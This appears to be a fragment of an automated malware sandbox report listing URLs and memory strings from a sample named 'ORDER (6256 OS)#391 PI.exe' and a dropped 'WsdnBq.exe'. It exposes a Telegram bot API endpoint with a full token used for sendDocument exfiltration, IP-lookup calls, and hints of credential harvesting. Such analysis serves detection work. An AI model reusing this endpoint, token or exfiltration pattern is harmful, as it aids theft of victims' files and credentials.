        http://www.galapagosdesign.com/staff/dennis.htmY0%Avira URL Cloudsafe
        https://VEVgTqSNHWikc.orgD0%Avira URL Cloudsafe
        http://www.carterandcone.comigXje0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/Y0m0%Avira URL Cloudsafe
        http://www.fontbureau.comalsq0%Avira URL Cloudsafe
        http://www.fontbureau.comsivFf0%Avira URL Cloudsafe
        http://www.fontbureau.comK0%Avira URL Cloudsafe
        http://www.fontbureau.comonyT0%Avira URL Cloudsafe
        http://www.fontbureau.comF.0%Avira URL Cloudsafe
        http://www.fontbureau.come.comQO0%Avira URL Cloudsafe
        http://www.fontbureau.comtalik0%Avira URL Cloudsafe
        http://www.fontbureau.comW.TTF00%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/FL0%Avira URL Cloudsafe
        http://www.fontbureau.comtop/0%Avira URL Cloudsafe
        http://www.fontbureau.commB0%Avira URL Cloudsafe
        https://VEVgTqSNHWikc.org0%Avira URL Cloudsafe
        https://api.ipify.orgMozilla/5.00%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.ipify.org.herokudns.com
        3.232.242.170
        truefalse
          unknown
          api.telegram.org
          149.154.167.220
          truefalse
            high
            api.ipify.org
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocumentfalse
                high
                https://api.ipify.org/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.comFQOORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers?ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.jiyu-kobo.co.jp/hu-hORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/oie.ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmacWsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comttodORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.goodfont.co.krORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comd.ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/QOORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comT.TTFORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comionaORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/9ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comedFBORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/cTheORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmYORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.ipify.orgORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://fontfabrik.comORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org4ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comessedKORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/0ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/Y0-eoORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://VEVgTqSNHWikc.orgDORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/.ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comigXjeORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/Y0mORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://DynDns.comDynDNSnamejidpasswordPsi/PsiWsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.galapagosdesign.com/DPleaseORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/Y0ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com9ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comalsqORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.comsivFfORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
